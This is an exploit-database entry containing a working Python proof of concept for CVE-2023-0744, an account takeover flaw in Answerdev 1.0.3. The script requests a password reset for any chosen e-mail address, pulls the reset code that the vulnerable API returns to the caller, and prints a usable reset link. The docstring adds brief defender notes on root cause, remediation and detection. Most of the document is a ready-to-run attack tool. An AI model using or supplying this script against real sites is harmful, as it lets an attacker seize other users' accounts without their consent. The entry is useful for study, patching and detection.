## https://sploitus.com/exploit?id=PACKETSTORM:171733
# Exploit Title: Answerdev 1.0.3 - Account Takeover   
# Date: Reported on Jan 24th 2023  
# Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp  
# Vendor Homepage: https://answer.dev/  
# Software Link: https://github.com/answerdev/answer  
# Version: 1.0.3  
# Tested on: Ubuntu 22.04 / Debian 11  
# CVE : CVE-2023-0744  
  
  
from sys import argv  
import urllib3  
from requests import post  
  
# Suppress urllib3's InsecureRequestWarning. The request in ato() is sent with
# verify=False, so TLS certificate validation is skipped and urllib3 would
# otherwise emit this warning on each unverified HTTPS call.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  
  
def ato(url: list, email: str) -> str:
    """Request a password reset for *email* and build the reset link from the reply.

    The function sends ``{"e_mail": email}`` as JSON to
    ``<base>answer/api/v1/user/password/reset`` and reads the ``data`` field of
    the JSON response, which it then uses as the ``code`` query parameter of
    ``<base>users/password-reset``. The proof of concept therefore depends on
    the reset endpoint handing the reset code back to the HTTP caller instead
    of delivering it only by e-mail (the flaw tracked as CVE-2023-0744
    according to the header of this file).

    Notes for defenders:
      * Root cause to check in a review: a password-reset *request* endpoint
        should return no secret to the requester; the reset code belongs only
        in the message sent to the mailbox owner.
      * Remediation check: after moving off the affected 1.0.3 release, confirm
        with a test account that the response no longer carries a usable value
        in ``data``.
      * Detection idea (to be adapted to the deployment's logs): reset requests
        for an account followed shortly by a visit to
        ``users/password-reset?code=...`` from the same client.

    Args:
        url: Pieces of the base URL; they are concatenated with ``"".join``.
            The caller in this file passes a one-element list ending in "/".
        email: Address of the account the reset is requested for.

    Returns:
        ``"Your Link: ..."`` with the reset URL on success, otherwise
        ``"Cant reach URL: <error>"``. Every exception is folded into the
        second form, so it also appears when the server answers without a
        string ``data`` field, not only when the host is unreachable.
    """
    try:
        base = "".join(url)
        response = post(
            f"{base}answer/api/v1/user/password/reset",
            json={"e_mail": email},
            verify=False,  # certificate validation is disabled for this request
        )
        # The reset code is taken straight from the API response body.
        reset_code = response.json()["data"]
        return f"Your Link: {base}users/password-reset?code=" + reset_code
    except Exception as err:
        return f"Cant reach URL: {err}"
  
  
if __name__ == "__main__":
    # Exactly two positional arguments are expected: base URL and e-mail address.
    if len(argv) != 3:
        print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com")
        exit()

    # ato() appends paths directly to the base URL, so make sure it ends in "/".
    base_url = argv[1]
    if not base_url.endswith("/"):
        base_url = base_url + "/"

    print(ato([base_url], str(argv[2])))